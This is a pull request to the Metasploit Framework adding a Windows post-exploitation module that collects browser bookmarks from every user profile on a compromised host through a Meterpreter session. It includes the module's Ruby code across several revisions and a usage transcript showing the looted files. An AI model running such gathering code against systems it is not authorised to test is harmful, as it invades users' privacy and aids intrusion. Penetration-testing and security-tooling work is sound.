### PR TITLE
Create get_bookmarks.rb

### DIFF
--- a/documentation/modules/post/windows/gather/get_bookmarks.md
+++ b/documentation/modules/post/windows/gather/get_bookmarks.md
@@ -1,0 +1,54 @@
+## Vulnerable Application
+
+This modules retrieves stored bookmarks for Google Chrome, Microsoft Edge and Opera if the browsers exist on the target machine.
+
+## Verification Steps
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/get_bookmarks```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+
+  **SESSION**
+
+  The session to run this module on.
+
+## Scenarios
+
+### Windows 11.
+
+  ```
+msf6 exploit(multi/handler) > use post/windows/gather/get_bookmarks
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+
+msf6 post(windows/gather/get_bookmarks) > set session 3
+session => 3
+msf6 post(windows/gather/get_bookmarks) > run
+
+
+[-] Error loading USER S-1-5-21-1515542607-384395710-682424177-500: Profile doesn't exist or cannot be accessed
+[*] BOOKMARKS FOR <user>
+[*] Bookmarks stored: C:/metasploit/apps/pro/loot/20220405164635_default_GoogleChrome.boo_219405.txt
+[-] Error loading USER S-1-5-21-1515542607-384395710-682424177-500: Profile doesn't exist or cannot be accessed
+[*] BOOKMARKS FOR <user>
+[*] Bookmarks stored: C:/metasploit/apps/pro/loot/20220405164637_default_Opera.bookmarks_833249.txt
+[-] Error loading USER S-1-5-21-1515542607-384395710-682424177-500: Profile doesn't exist or cannot be accessed
+[*] BOOKMARKS FOR <user>
+[*] Bookmarks stored: C:/metasploit/apps/pro/loot/20220405164640_default_Edge.bookmarks_245676.txt
+[*] Post module execution completed
+
+msf6 post(windows/gather/get_bookmarks) > loot
+
+Loot
+====
+
+host             service  type                    name                                                                                 content     info                        path
+----             -------  ----                    ----                                                                                 -------     ----                        ----
+<ip>                       Opera.bookmarks         #<Msf::Sessions::Meterpreter_x64_Win:0x000001dd509f2f48>_Opera_bookmarks.txt         text/plain  Bookmarks for Opera         C:/metasploit/apps/pro/loot/20220405164430_default_Opera.bookmarks_344376.txt
+<ip>                       Edge.bookmarks          #<Msf::Sessions::Meterpreter_x64_Win:0x000001dd509f2f48>_Edge_bookmarks.txt          text/plain  Bookmarks for Edge          C:/metasploit/apps/pro/loot/20220405164432_default_Edge.bookmarks_798475.txt
+<ip>                       GoogleChrome.bookmarks  #<Msf::Sessions::Meterpreter_x64_Win:0x000001dd509f2f48>_GoogleChrome_bookmarks.txt  text/plain  Bookmarks for GoogleChrome  C:/metasploit/apps/pro/loot/20220405164427_default_GoogleChrome.boo_256524.txt
+
+  ```

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'jerrelgordon'],
         'Platform' => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'SessionTypes' => ['meterpreter'],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -29,48 +29,40 @@ class MetasploitModule < Msf::Post
   end
 
   def get_bookmarks(browser)
-    print_status('Bookmarks on: ' + browser)
     fileexists = false # initializes file as not found
     grab_user_profiles.each do |user| # parses information for all users on target machine into a list.
       # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
       if (browser == 'GoogleChrome')
         next unless user['LocalAppData']
 
-        bookmark_path = user['LocalAppData'] + '\\Google\\Chrome\\User Data\\Default\\Bookmarks' # sets path for Google Chrome Bookmarks
-        print_status('Google Chrome Google Chrome Google Chrome')
-        print_status('Google Chrome Google Chrome Google Chrome')
-        print_status('Google Chrome Google Chrome Google Chrome')
-        print_status('Google Chrome Google Chrome Google Chrome')
+        bookmark_path = "#{user['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Bookmarks" # sets path for Google Chrome Bookmarks
       elsif (browser == 'Edge')
         next unless user['LocalAppData']
 
-        bookmark_path = user['LocalAppData'] + '\\Microsoft\\Edge\\User Data\\Default\\Bookmarks' # sets path for Microsoft Edge Bookmarks
-        print_status('Edge Edge Edge')
-        print_status('Edge Edge Edge')
-        print_status('Edge Edge Edge')
-        print_status('Edge Edge Edge')
+        bookmark_path = "#{user['LocalAppData']}\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" # sets path for Microsoft Edge Bookmarks
       elsif (browser == 'Opera')
         next unless user['AppData']
 
-        bookmark_path = user['AppData'] + '\\Opera Software\\Opera Stable\\Bookmarks' # sets path for Opera Bookmarks
-        print_status('Opera Opera Opera')
-        print_status('Opera Opera Opera')
-        print_status('Opera Opera Opera')
-        print_status('Opera Opera Opera')
+        bookmark_path = "#{user['AppData']}\\Opera Software\\Opera Stable\\Bookmarks" # sets path for Opera Bookmarks
       end
       next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
 
       fileexists = true
-      print_status('BOOKMARKS FOR' + user['ProfileDir'])
-      # puts "BOOKMARKS FOR " + user['ProfileDir']
-      # puts "\n"
+      print_status("BOOKMARKS FOR #{user['ProfileDir']}")
       file = read_file(bookmark_path)
-      # puts file
-      print_good(file)
+      stored_bookmarks = store_loot(
+        "#{browser}.bookmarks",
+        'text/plain',
+        session,
+        file,
+        "#{session}_#{browser}_bookmarks.txt",
+        "Bookmarks for #{browser}"
+      )
+      print_status("Bookmarks stored: #{stored_bookmarks}")
+      # print_good(file)
     end
     if (fileexists == false) # if file was not found, prints no file found.
-      # puts "No Bookmarks found for " + browser
-      print_status('No Bookmarks found for' + browser)
+      print_status("No Bookmarks found for #{browser}")
     end
   end
 end

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -1,0 +1,91 @@
+class MetasploitModule < Msf::Post
+    include Msf::Post::File
+    include Msf::Post::Windows::UserProfiles
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'Bookmarked Sites Retriever',
+          'Description' => %q{
+            This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [ 'jerrelgordon'],
+          'Platform' => [ 'win' ],
+          'SessionTypes' => [ 'meterpreter', 'shell' ]
+        )
+   )
+    end
+
+    def run
+      
+      GetBookmarks("GoogleChrome") #gets bookmarks for google chrome
+      GetBookmarks("Opera") #gets bookmarks for opera
+      GetBookmarks("Edge") #gets bookmarks for edge
+
+    end
+
+
+    def GetBookmarks (browser)
+
+      print_status("Bookmarks on: " + browser) 
+      fileexists = false #initializes file as not found
+  
+      grab_user_profiles().each do |user| #parses information for all users on target machine into a list.
+        
+        #If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
+
+
+        if (browser == "GoogleChrome")
+          next unless user['LocalAppData']
+          bookmark_path = user['LocalAppData'] + "\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
+          puts "Google Chrome Google Chrome Google Chrome"
+          puts "Google Chrome Google Chrome Google Chrome"
+          puts "Google Chrome Google Chrome Google Chrome"
+          puts "Google Chrome Google Chrome Google Chrome"
+          puts "Google Chrome Google Chrome Google Chrome"
+
+        elsif (browser == "Edge")
+          next unless user['LocalAppData']
+          bookmark_path = user['LocalAppData'] + "\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" #sets path for Microsoft Edge Bookmarks
+          puts "Edge Edge Edge"
+          puts "Edge Edge Edge"
+          puts "Edge Edge Edge"
+          puts "Edge Edge Edge"
+          puts "Edge Edge Edge"
+
+
+        elsif (browser == "Opera")
+          next unless user['AppData']
+          bookmark_path = user['AppData'] + "\\Opera Software\\Opera Stable\\Bookmarks" #sets path for Opera Bookmarks
+          puts "Opera Opera Opera"
+          puts "Opera Opera Opera"
+          puts "Opera Opera Opera"
+          puts "Opera Opera Opera"
+          puts "Opera Opera Opera"
+
+        end
+        
+        next unless file?(bookmark_path) #if file exist it is set to found, then all the bookmarks are outputted to standard output (the shell)
+
+          fileexists = true
+          puts "BOOKMARKS FOR " + user['ProfileDir']
+          puts "\n"
+          file = File.open(bookmark_path)
+    
+          File.foreach(bookmark_path) { |line| puts line }
+    
+          file.close
+      
+
+      end
+
+      if (fileexists == false) # if file was not found, prints no file found.
+        puts "No Bookmarks found for " + broswer
+      
+      end
+
+    end
+  
+
+  end

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -1,3 +1,4 @@
+
 class MetasploitModule < Msf::Post
     include Msf::Post::File
     include Msf::Post::Windows::UserProfiles
@@ -35,9 +36,11 @@ class MetasploitModule < Msf::Post
         
         #If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
 
-
+        
         if (browser == "GoogleChrome")
+        
           next unless user['LocalAppData']
+        
           bookmark_path = user['LocalAppData'] + "\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
           puts "Google Chrome Google Chrome Google Chrome"
           puts "Google Chrome Google Chrome Google Chrome"
@@ -66,22 +69,19 @@ class MetasploitModule < Msf::Post
 
         end
         
-        next unless file?(bookmark_path) #if file exist it is set to found, then all the bookmarks are outputted to standard output (the shell)
+        next unless file?(bookmark_path) #if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
 
           fileexists = true
           puts "BOOKMARKS FOR " + user['ProfileDir']
           puts "\n"
-          file = File.open(bookmark_path)
+          file = read_file(bookmark_path)
     
-          File.foreach(bookmark_path) { |line| puts line }
-    
-          file.close
-      
+          puts file
 
       end
 
       if (fileexists == false) # if file was not found, prints no file found.
-        puts "No Bookmarks found for " + broswer
+        puts "No Bookmarks found for " + browser
       
       end
 

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -1,68 +1,76 @@
 class MetasploitModule < Msf::Post
-    include Msf::Post::File
-    include Msf::Post::Windows::UserProfiles
-    def initialize(info = {})
-      super(
-        update_info(
-          info,
-          'Name' => 'Bookmarked Sites Retriever',
-          'Description' => %q{
-            This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.
-          },
-          'License' => MSF_LICENSE,
-          'Author' => [ 'jerrelgordon'],
-          'Platform' => [ 'win' ],
-          'SessionTypes' => [ 'meterpreter', 'shell' ]
-        )
-   )
-    end
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bookmarked Sites Retriever',
+        'Description' => %q{
+          This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'jerrelgordon'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+ )
+  end
 
-    def run
-      get_bookmarks("GoogleChrome") # gets bookmarks for google chrome
-      get_bookmarks("Opera") # gets bookmarks for opera
-      get_bookmarks("Edge") # gets bookmarks for edge
-    end
+  def run
+    get_bookmarks('GoogleChrome') # gets bookmarks for google chrome
+    get_bookmarks('Opera') # gets bookmarks for opera
+    get_bookmarks('Edge') # gets bookmarks for edge
+  end
 
+  def get_bookmarks(browser)
+    print_status('Bookmarks on: ' + browser)
+    fileexists = false # initializes file as not found
+    grab_user_profiles.each do |user| # parses information for all users on target machine into a list.
+      # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
+      if (browser == 'GoogleChrome')
+        next unless user['LocalAppData']
 
-    def get_bookmarks(browser)
-      print_status("Bookmarks on: " + browser) 
-      fileexists = false # initializes file as not found
-      grab_user_profiles().each do |user| #parses information for all users on target machine into a list.
-        # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
-        if (browser == "GoogleChrome")
-            next unless user['LocalAppData']
-            bookmark_path = user['LocalAppData'] + "\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
-            print_status("Google Chrome Google Chrome Google Chrome")
-            print_status("Google Chrome Google Chrome Google Chrome")
-            print_status("Google Chrome Google Chrome Google Chrome")
-            print_status("Google Chrome Google Chrome Google Chrome")
-        elsif (browser == "Edge")
-            next unless user['LocalAppData']
-            bookmark_path = user['LocalAppData'] + "\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" #sets path for Microsoft Edge Bookmarks
-            print_status("Edge Edge Edge")
-            print_status("Edge Edge Edge")
-            print_status("Edge Edge Edge")
-            print_status("Edge Edge Edge")
-        elsif (browser == "Opera")
-            next unless user['AppData']
-            bookmark_path = user['AppData'] + "\\Opera Software\\Opera Stable\\Bookmarks" #sets path for Opera Bookmarks
-            print_status("Opera Opera Opera")
-            print_status("Opera Opera Opera")
-            print_status("Opera Opera Opera")
-            print_status("Opera Opera Opera")
-        end
-        next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
-            fileexists = true
-            print_status("BOOKMARKS FOR" + user['ProfileDir'] )
-            # puts "BOOKMARKS FOR " + user['ProfileDir']
-            # puts "\n"
-            file = read_file(bookmark_path)
-            # puts file
-            print_good(file)
+        bookmark_path = user['LocalAppData'] + '\\Google\\Chrome\\User Data\\Default\\Bookmarks' # sets path for Google Chrome Bookmarks
+        print_status('Google Chrome Google Chrome Google Chrome')
+        print_status('Google Chrome Google Chrome Google Chrome')
+        print_status('Google Chrome Google Chrome Google Chrome')
+        print_status('Google Chrome Google Chrome Google Chrome')
+      elsif (browser == 'Edge')
+        next unless user['LocalAppData']
+
+        bookmark_path = user['LocalAppData'] + '\\Microsoft\\Edge\\User Data\\Default\\Bookmarks' # sets path for Microsoft Edge Bookmarks
+        print_status('Edge Edge Edge')
+        print_status('Edge Edge Edge')
+        print_status('Edge Edge Edge')
+        print_status('Edge Edge Edge')
+      elsif (browser == 'Opera')
+        next unless user['AppData']
+
+        bookmark_path = user['AppData'] + '\\Opera Software\\Opera Stable\\Bookmarks' # sets path for Opera Bookmarks
+        print_status('Opera Opera Opera')
+        print_status('Opera Opera Opera')
+        print_status('Opera Opera Opera')
+        print_status('Opera Opera Opera')
       end
-      if (fileexists == false) # if file was not found, prints no file found.
-        # puts "No Bookmarks found for " + browser
-        print_status("No Bookmarks found for" + browser )
-      end
+      next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
+
+      fileexists = true
+      print_status('BOOKMARKS FOR' + user['ProfileDir'])
+      # puts "BOOKMARKS FOR " + user['ProfileDir']
+      # puts "\n"
+      file = read_file(bookmark_path)
+      # puts file
+      print_good(file)
     end
+    if (fileexists == false) # if file was not found, prints no file found.
+      # puts "No Bookmarks found for " + browser
+      print_status('No Bookmarks found for' + browser)
+    end
+  end
 end

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -1,4 +1,3 @@
-
 class MetasploitModule < Msf::Post
     include Msf::Post::File
     include Msf::Post::Windows::UserProfiles
@@ -19,73 +18,51 @@ class MetasploitModule < Msf::Post
     end
 
     def run
-      
-      GetBookmarks("GoogleChrome") #gets bookmarks for google chrome
-      GetBookmarks("Opera") #gets bookmarks for opera
-      GetBookmarks("Edge") #gets bookmarks for edge
-
+      get_bookmarks("GoogleChrome") # gets bookmarks for google chrome
+      get_bookmarks("Opera") # gets bookmarks for opera
+      get_bookmarks("Edge") # gets bookmarks for edge
     end
 
 
-    def GetBookmarks (browser)
-
+    def get_bookmarks(browser)
       print_status("Bookmarks on: " + browser) 
-      fileexists = false #initializes file as not found
-  
+      fileexists = false # initializes file as not found
       grab_user_profiles().each do |user| #parses information for all users on target machine into a list.
-        
-        #If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
-
-        
+        # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
         if (browser == "GoogleChrome")
-        
-          next unless user['LocalAppData']
-        
-          bookmark_path = user['LocalAppData'] + "\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
-          puts "Google Chrome Google Chrome Google Chrome"
-          puts "Google Chrome Google Chrome Google Chrome"
-          puts "Google Chrome Google Chrome Google Chrome"
-          puts "Google Chrome Google Chrome Google Chrome"
-          puts "Google Chrome Google Chrome Google Chrome"
-
+            next unless user['LocalAppData']
+            bookmark_path = user['LocalAppData'] + "\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
+            print_status("Google Chrome Google Chrome Google Chrome")
+            print_status("Google Chrome Google Chrome Google Chrome")
+            print_status("Google Chrome Google Chrome Google Chrome")
+            print_status("Google Chrome Google Chrome Google Chrome")
         elsif (browser == "Edge")
-          next unless user['LocalAppData']
-          bookmark_path = user['LocalAppData'] + "\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" #sets path for Microsoft Edge Bookmarks
-          puts "Edge Edge Edge"
-          puts "Edge Edge Edge"
-          puts "Edge Edge Edge"
-          puts "Edge Edge Edge"
-          puts "Edge Edge Edge"
-
-
+            next unless user['LocalAppData']
+            bookmark_path = user['LocalAppData'] + "\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" #sets path for Microsoft Edge Bookmarks
+            print_status("Edge Edge Edge")
+            print_status("Edge Edge Edge")
+            print_status("Edge Edge Edge")
+            print_status("Edge Edge Edge")
         elsif (browser == "Opera")
-          next unless user['AppData']
-          bookmark_path = user['AppData'] + "\\Opera Software\\Opera Stable\\Bookmarks" #sets path for Opera Bookmarks
-          puts "Opera Opera Opera"
-          puts "Opera Opera Opera"
-          puts "Opera Opera Opera"
-          puts "Opera Opera Opera"
-          puts "Opera Opera Opera"
-
+            next unless user['AppData']
+            bookmark_path = user['AppData'] + "\\Opera Software\\Opera Stable\\Bookmarks" #sets path for Opera Bookmarks
+            print_status("Opera Opera Opera")
+            print_status("Opera Opera Opera")
+            print_status("Opera Opera Opera")
+            print_status("Opera Opera Opera")
         end
-        
-        next unless file?(bookmark_path) #if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
-
-          fileexists = true
-          puts "BOOKMARKS FOR " + user['ProfileDir']
-          puts "\n"
-          file = read_file(bookmark_path)
-    
-          puts file
-
+        next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
+            fileexists = true
+            print_status("BOOKMARKS FOR" + user['ProfileDir'] )
+            # puts "BOOKMARKS FOR " + user['ProfileDir']
+            # puts "\n"
+            file = read_file(bookmark_path)
+            # puts file
+            print_good(file)
       end
-
       if (fileexists == false) # if file was not found, prints no file found.
-        puts "No Bookmarks found for " + browser
-      
+        # puts "No Bookmarks found for " + browser
+        print_status("No Bookmarks found for" + browser )
       end
-
     end
-  
-
-  end
+end

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post
   end
 
   def get_bookmarks(browser)
-    fileexists = false # initializes file as not found
+    file_exists = false # initializes file as not found
     grab_user_profiles.each do |user| # parses information for all users on target machine into a list.
       # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
       if (browser == 'GoogleChrome')
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Post
       end
       next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
 
-      fileexists = true
+      file_exists = true
       print_status("BOOKMARKS FOR #{user['ProfileDir']}")
       file = read_file(bookmark_path)
       stored_bookmarks = store_loot(
@@ -59,9 +59,8 @@ class MetasploitModule < Msf::Post
         "Bookmarks for #{browser}"
       )
       print_status("Bookmarks stored: #{stored_bookmarks}")
-      # print_good(file)
     end
-    if (fileexists == false) # if file was not found, prints no file found.
+    if (file_exists == false) # if file was not found, prints no file found.
       print_status("No Bookmarks found for #{browser}")
     end
   end

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -51,6 +51,7 @@ class MetasploitModule < Msf::Post
         bookmark_path = (user['Favorites']).to_s # sets path for IE Bookmarks Folder
         count = 1
         dir(bookmark_path).each do |file| # IE bookmarks stored individually as files so loots each one
+          next if ['.', '..'].include?(file)
           file_exists = true
           print_status("BOOKMARKS FOR #{user['ProfileDir']}")
           path2 = "#{bookmark_path}\\#{file}"

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Post
         count = 1
         dir(bookmark_path).each do |file| # IE bookmarks stored individually as files so loots each one
           next if ['.', '..'].include?(file)
-          
+
           file_exists = true
           print_status("BOOKMARKS FOR #{user['ProfileDir']}")
           path2 = "#{bookmark_path}\\#{file}"

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post
         'SessionTypes' => ['meterpreter'],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [REPEATABLE_SESSION],
+          'Reliability' => [ ],
           'SideEffects' => []
         }
       )

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -26,6 +26,7 @@ class MetasploitModule < Msf::Post
     get_bookmarks('GoogleChrome') # gets bookmarks for google chrome
     get_bookmarks('Opera') # gets bookmarks for opera
     get_bookmarks('Edge') # gets bookmarks for edge
+    get_bookmarks('IE') # gets bookmarks for internet explorer
   end
 
   def get_bookmarks(browser)
@@ -44,7 +45,29 @@ class MetasploitModule < Msf::Post
         next unless user['AppData']
 
         bookmark_path = "#{user['AppData']}\\Opera Software\\Opera Stable\\Bookmarks" # sets path for Opera Bookmarks
+      elsif (browser == 'IE')
+        next unless user['Favorites']
+
+        bookmark_path = (user['Favorites']).to_s # sets path for IE Bookmarks Folder
+        count = 1
+        dir(bookmark_path).each do |file| # IE bookmarks stored individually as files so loots each one
+          file_exists = true
+          print_status("BOOKMARKS FOR #{user['ProfileDir']}")
+          path2 = "#{bookmark_path}\\#{file}"
+          file_contents = read_file(path2)
+          stored_bookmarks = store_loot(
+            "#{browser}.bookmarks",
+            'text/plain',
+            session,
+            file_contents,
+            "#{session}_#{count}_#{browser}_bookmarks.txt",
+            "Bookmarks for #{browser}"
+          )
+          print_status("Bookmarks stored: #{stored_bookmarks}")
+          count += 1
+        end
       end
+
       next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
 
       file_exists = true

--- a/modules/post/windows/gather/get_bookmarks.rb
+++ b/modules/post/windows/gather/get_bookmarks.rb
@@ -52,6 +52,7 @@ class MetasploitModule < Msf::Post
         count = 1
         dir(bookmark_path).each do |file| # IE bookmarks stored individually as files so loots each one
           next if ['.', '..'].include?(file)
+          
           file_exists = true
           print_status("BOOKMARKS FOR #{user['ProfileDir']}")
           path2 = "#{bookmark_path}\\#{file}"


### PR DESCRIPTION
Metasploit Module that retrieves bookmarks from the following browsers: Google Chrome, Opera & Microsoft Edge.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Establish meterpreter shell on target machine
- [x] When shell is established type the command `run post/windows/gather/get_bookmarks`
- [x] Bookmarks for all users, for all Google Chrome, Opera & Edge will be retrieved and outputted if they exist.

